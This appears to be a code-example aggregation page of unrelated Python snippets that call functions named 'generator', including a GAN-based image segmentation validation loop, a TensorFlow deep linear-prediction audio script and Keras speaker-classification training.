        for step, (x, y, x_1, x_2, y_1, y_2, s, k_1, k_2, inter_subject,
                   intra_subject) in enumerate(loader):
            #print(step)
            #Load training example to device
            x, y, k_1, k_2 = x.to(device), y.to(device), k_1.to(
                device), k_2.to(device)
            y_1, y_2 = y_1.to(device), y_2.to(device)
            s, inter_subject, intra_subject = s.to(device), inter_subject.to(
                device), intra_subject.to(device)

            #Validate
            pred = discriminator(y_1, y_2)
            dis_loss = dis_criterion(pred, s)
            run_dis_loss += dis_loss.item()

            # Generate fake images
            _f_1_f, _f_1_b = generator(x, k_1)
            f_1_f, f_1_b = scale_factor * _f_1_f, scale_factor * _f_1_b
            z_1 = warper(x, f_1_f)
            y_1 = warper(y, f_1_f)

            _f_2_f, _f_2_b = generator(x, k_2)
            f_2_f, f_2_b = scale_factor * _f_2_f, scale_factor * _f_2_b
            z_2 = warper(x, f_2_f)
            y_2 = warper(y, f_2_f)

            # Reconstruct image
            x_r_1 = warper(z_1, f_1_b)
            x_r_2 = warper(z_2, f_2_b)

            y_r_1 = warper(y_1, f_1_b)
            y_r_2 = warper(y_2, f_2_b)

            # Segmentation
            hat_y_d_1 = segmentator(z_1)
            hat_y_d_2 = segmentator(z_2)
            hat_y_1 = warper(hat_y_d_1, f_1_b)
            hat_y_2 = warper(hat_y_d_2, f_2_b)

            pred = discriminator(hat_y_1, y)

            # Compute loss
            res_1 = -ssim_criterion(x_r_1, x)
            res_2 = -ssim_criterion(x_r_2, x)
            reconstruction_ssim_loss = 1 / 2 * (res_1 + res_2)
            dice_1 = dice_criterion(y_r_1, y)
            dice_2 = dice_criterion(y_r_2, y)
            reconstruction_dice_loss = 1 / 2 * (dice_1 + dice_2)
            inv_loss = 1 / 2 * (reconstruction_ssim_loss +
                                reconstruction_dice_loss)

            distortion_loss = ssim_criterion(z_1, z_2)
            distortion_dice_loss = -dice_criterion(y_1, y_2)
            div_loss = 1 / 2 * (distortion_loss + distortion_dice_loss)

            # Smooth
            smooth_1 = smooth_criterion(_f_1_f)
            smooth_2 = smooth_criterion(_f_2_f)
            smooth_3 = smooth_criterion(_f_1_b)
            smooth_4 = smooth_criterion(_f_2_b)
            smooth = 0.25 * (smooth_1 + smooth_2 + smooth_3 + smooth_4)

            # segmentation Loss
            seg_loss_1 = focal_criterion(hat_y_1, y)
            seg_loss_2 = focal_criterion(hat_y_2, y)
            segmentation_loss = 0.5 * (seg_loss_1 + seg_loss_2)

            adv_loss = dis_criterion(pred, inter_subject)

            # compute reconstructed ground truth dice score
            dice_score_gt_1 = compute_dice_score(y_r_1, y, device)
            dice_score_gt_2 = compute_dice_score(y_r_2, y, device)
            dice_score_gt = 0.5 * (dice_score_gt_1 + dice_score_gt_2)
            run_dice_gt += dice_score_gt
            # compute reconstructed predicted segmap dice score
            dice_score_pd_1 = compute_dice_score(hat_y_1, y, device)
            dice_score_pd_2 = compute_dice_score(hat_y_2, y, device)
            dice_score_pd = 0.5 * (dice_score_pd_1 + dice_score_pd_2)
            run_dice_pd += dice_score_pd

            run_adv_loss += adv_loss.item()
            run_inv_loss += inv_loss.item()
            run_smooth_loss += smooth.item()
            run_div_loss += div_loss.item()
            run_segmentation_loss += segmentation_loss.item()

    dur = time() - start_time

    avg_dis_loss = run_dis_loss / (step + 1)
    avg_inv_loss = run_inv_loss / (step + 1)
    avg_div_loss = run_div_loss / (step + 1)
    avg_smooth_loss = run_smooth / (step + 1)
    avg_adv_loss = run_adv_loss / (step + 1)
    avg_segmentation_loss = run_segmentation_loss / (step + 1)
    avg_dice_gt = run_dice_gt / (step + 1)
    avg_dice_pd = run_dice_pd / (step + 1)

    #Print log
    print('invertibility_loss:      {:.4f} -- diversity_loss:     {:.4f}'\
      .format(avg_inv_loss, avg_div_loss))
    print('reconstruction_dice_score:{:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_gt[0],avg_dice_gt[1],avg_dice_gt[2],avg_dice_gt[3],avg_dice_gt[4],avg_dice_gt[5]))
    print('segmentation_loss:        {:.4f}'\
      .format(avg_segmentation_loss))
    print('Segmentation_dice_score:  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_pd[0],avg_dice_pd[1],avg_dice_pd[2],avg_dice_pd[3],avg_dice_pd[4],avg_dice_pd[5]))
    print('smooth:                   {:.4f}'.format(avg_smooth))
    print('discriminator:                   {:.4f}'.format(avg_dis_loss))
    print('adversarial  :                   {:.4f}'.format(avg_adv_loss))
    print('duration:{:.0f}'.format(dur))

    return
Example #33
0
 def getter(self):
     return generator(self.data['owner_id'], self.data['owner_type'])
Example #34
0
def main(_):
    file_queue = tf.train.string_input_producer([FLAGS.e2e_dataset])
    get_wav = read_and_decode(file_queue, FLAGS.canvas_size)
    wavbatch = tf.train.shuffle_batch([get_wav],
                                      batch_size=FLAGS.batch_size,
                                      num_threads=2,
                                      capacity=1000 + 3 * FLAGS.batch_size,
                                      min_after_dequeue=1000,
                                      name='wav_and_noisy')
    lambdaG = 100
    lambdaprediction = 1
    savefile = 'DeepLPcoeff.npz'
    learning_rate = 0.00001  # 0.0001

    deltamaxstep = 50
    maxstep = 5000  # 10000
    test_epochs = 100

    training_epochs = 10  # 5000
    display_step = int(maxstep / 10)  # 500
    p = 8
    p = 18

    rng = np.random

    FLAGS.canvas_size = FLAGS.canvas_size + p

    # tf Graph input (only pictures)
    X = tf.placeholder(tf.float32, [FLAGS.canvas_size, p])
    # X0 = tf.placeholder(tf.float32, [FLAGS.canvas_size, p])

    Y = tf.placeholder(tf.float32, [FLAGS.canvas_size, 1])

    class param:
        def __init__(self):
            self.g_enc_depths = ''  # 名称
            self.d_num_fmaps = ''  # 尺寸
            self.bias_downconv = False
            self.deconv_type = 'deconv'
            self.bias_deconv = False
            # self.list = []  # 列表

    aparam = param()  # 定义结构对象

    aparam.g_enc_depths = [
        16
    ]  # , 32]#, 32, 64]#, 64, 128, 128, 256, 256, 512, 1024]
    # Define D fmaps
    # aparam.d_num_fmaps = [16, 32, 32, 64, 64, 128, 128, 256, 256, 512, 1024]

    generator = AEGenerator(aparam)

    G = generator(X, is_ref=False, z_on=False)

    G = tf.squeeze(G)

    # Set model weights
    W = tf.placeholder(tf.float32, [p, 1])  # rng.randn(p,1)
    # b = tf.Variable(rng.randn(1), name="lastbias", dtype=tf.float32) #tf.zeros([p,1])

    # Construct a linear model
    # pred = tf.add(tf.matmul(X, W), b) # tf.multiply is wrong

    # W0 = tf.Variable(rng.randn(p, 1), name="lastweight0", dtype=tf.float32)  # rng.randn(p,1)

    # y_pred0=tf.matmul(X0,W0)

    # Prediction
    y_pred = tf.matmul(G, W)  # what if i use lpca for w initialization

    # Define loss and optimizer, minimize the squared error
    cost = tf.reduce_mean(tf.pow(Y - y_pred, 2))
    # cost0 = tf.reduce_mean(tf.pow(Y - y_pred0, 2))

    # cost=lambdaG*tf.reduce_mean(tf.pow(G-X,2))+lambdaprediction*cost0

    optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(cost)
    # optimizer0 = tf.train.RMSPropOptimizer(learning_rate0).minimize(cost0)

    # optimizertest = tf.train.RMSPropOptimizer(learning_rate).minimize(cost, var_list=[W])

    # init = tf.global_variables_initializer()

    with tf.Session() as sess:
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)

        sess.run(tf.global_variables_initializer())

        state = load_trainable_vars(
            sess, savefile)  # must load AFTER the initializer

        # must use this same Session to perform all training
        # if we start a new Session, things would replay and we'd be training with our validation set (no no)

        # done = state.get('done', [])
        log = str(state.get('log', ''))

        step = 1

        training_cost = 0
        # init.run()

        try:
            while not coord.should_stop():
                inputdata = sess.run([wavbatch])
                inputdata = np.squeeze(inputdata)

                train_X = np.asarray(
                    hankel(np.append(np.zeros(p), inputdata), np.zeros(
                        (p, 1))))

                # print(train_X.shape)
                ##print(inputdata)
                train_Y = np.asarray([np.append(inputdata, np.zeros((p, 1)))])

                a, _, _ = lpc2(inputdata, p)
                b = -a[1:]
                lpca = np.asarray([b[::-1]]).T

                # print('linear prediction coeff=',lpca)
                train_Y = train_Y.T

                # ++++++++++++++++++++++
                for epoch in range(training_epochs):
                    # for (x, y) in zip(train_X, train_Y):
                    sess.run(optimizer,
                             feed_dict={
                                 X: train_X,
                                 Y: train_Y,
                                 W: lpca
                             })
                    # sess.run(optimizer0, feed_dict={X0: train_X, Y: train_Y})
                    # Display logs per epoch step
                    # if (epoch + 1) % display_step == 0:
                    #     c = sess.run(cost, feed_dict={X: train_X, Y: train_Y, W: lpca})
                    #     print("Epoch:", '%04d' % (epoch + 1), "cost=", "{:.9f}".format(c))
                    # c = sess.run(cost0, feed_dict={X0: train_X, Y: train_Y})
                    # print("Epoch:", '%04d' % (epoch + 1), "cost0=", "{:.9f}".format(c))

                # print("Optimization Finished!")

                training_cost += sess.run(cost,
                                          feed_dict={
                                              X: train_X,
                                              Y: train_Y,
                                              W: lpca
                                          })

                averagecost = 10 * np.log10(training_cost / step)

                if step % display_step == 0:
                    print("step ", step, "Training cost=", averagecost, '\n')
                # print('W=', sess.run(W),'\n')

                step += 1

                # +++++++++++++++++++++++

                if step >= maxstep:
                    log = log + '\n cost={nmse:.6f} dB in {i} iterations'.format(
                        nmse=averagecost, i=step)

                    state['log'] = log

                    save_trainable_vars(sess, savefile, **state)

                    maxstep = maxstep + deltamaxstep

                    for i in range(test_epochs):
                        inputdata, noisybatch0 = sess.run(
                            [wavbatch, noisybatch])
                        inputdata = np.squeeze(inputdata)
                        xt = inputdata
                        num_sample = len(xt)

                        def nextpow2(x):
                            return np.ceil(np.log2(x))

                        zpf = 3
                        Nfft = int(2**nextpow2(num_sample * zpf))

                        Org_XW = sp.fft(xt, Nfft)

                        test_X = np.asarray(
                            hankel(np.append(np.zeros(p), inputdata),
                                   np.zeros((p, 1))))

                        test_Y = np.asarray(
                            [np.append(inputdata, np.zeros((p, 1)))])

                        a, _, _ = lpc2(inputdata, p)
                        b = -a[1:]
                        lpca = np.asarray([b[::-1]]).T

                        test_Y = test_Y.T
                        test_G = sess.run(G, feed_dict={X: test_X})

                        invX = np.linalg.pinv(test_G)

                        myW = np.dot(invX, test_Y)

                        my_est = np.dot(test_G, myW)

                        my_est = my_est[0:-p]

                        plt.figure(1)
                        plt.subplot(221)
                        plt.plot(test_Y[0:-p], label='Original data')
                        plt.plot(test_Y[0:-p] - my_est,
                                 'r',
                                 label='my residue line')
                        plt.plot(test_Y[0:-p] - np.matmul(test_X[0:-p], lpca),
                                 'b--',
                                 label='LP residue line')
                        plt.legend()
                        print(
                            "LPC error is ",
                            np.mean(
                                np.square(test_Y[0:-p] -
                                          np.matmul(test_X[0:-p], lpca))))
                        print("my error is",
                              np.mean(np.square(test_Y[0:-p] - my_est)))

                        plt.subplot(222)
                        plt.plot(lpca, 'r--', label='LP coef')
                        plt.plot(myW, 'b', label='deep LP coef')
                        plt.legend()

                        Fs = 16000
                        myDLPcoef = np.append(1, -myW[::-1])

                        w0, Org_h0 = sig.freqz(1, myDLPcoef, Nfft, whole=True)
                        Org_F0 = Fs * w0 / (2 * np.pi)
                        Org_LP_coef = a
                        w, Org_h = sig.freqz(1, Org_LP_coef, Nfft, whole=True)
                        Org_F = Fs * w / (2 * np.pi)

                        Org_mag = abs(Org_XW)

                        Org_mag = 20 * np.log10(Org_mag)

                        f = np.asarray(range(Nfft)).astype(
                            np.float32) * Fs / Nfft

                        plt.subplot(212)
                        plt.plot(f, Org_mag, 'k-', label='signal')

                        plt.plot(Org_F,
                                 20 * np.log10(abs(Org_h)),
                                 'b--',
                                 label='lpc')
                        plt.plot(Org_F0,
                                 20 * np.log10(abs(Org_h0)),
                                 label='mylpc')

                        plt.xlim((0, Fs / 2))
                        plt.legend()

                        filtercoeff = np.append(0, -Org_LP_coef[1:])
                        est_x = sig.lfilter(filtercoeff, 1,
                                            xt)  # Estimated signal
                        e = xt - est_x

                        plt.show()
                        plt.close('all')

        except Exception as e:
            print(e)
            coord.request_stop()
        except IOError as e:

            coord.should_stop()
        else:
            pass

        finally:
            pass

        coord.request_stop()

        coord.join(threads)
Example #35
0
 def getter(self):
     return generator(self.data["father_id"], self.data["father_type"])
#print mel_spec_train.shape
#print labels_train.shape

model1 = create_cnn_model(nb_speaker=nb_speaker,
                          height_input=height_input,
                          width_input=width_input)
model1.summary()

sgd = optimizers.SGD(lr=0.001, momentum=0.9, nesterov=True)
model1.compile(optimizer=sgd,
               loss='categorical_crossentropy',
               metrics=['accuracy'])

# With validation data
history = model1.fit_generator(generator=generator(mel_spec_train,
                                                   labels_train,
                                                   samples_per_speaker,
                                                   nb_speaker, batch_size),
                               steps_per_epoch=steps_per_epoch,
                               epochs=epochs,
                               verbose=1,
                               validation_data=(mel_spec_test, labels_test))
model1.evaluate(mel_spec_test, labels_test)

#history = model1.fit(x = mel_spec_train, y = labels_train, batch_size = batch_size, epochs = epochs, verbose = 1)
"""
ROOTPATH = '/services/scratch/perception/cdamhieu/weights/'
checkpointer = ModelCheckpoint(filepath=ROOTPATH+"VGG16_"+PB_FLAG+"_"+idOar+"_weights.hdf5",
                                       monitor='loss',
                                       verbose=1,
                                       save_weights_only=True,
                                       save_best_only=True,
Example #37
0
 def getter(self):
     return generator(self.data["env_id"], self.data["env_type"])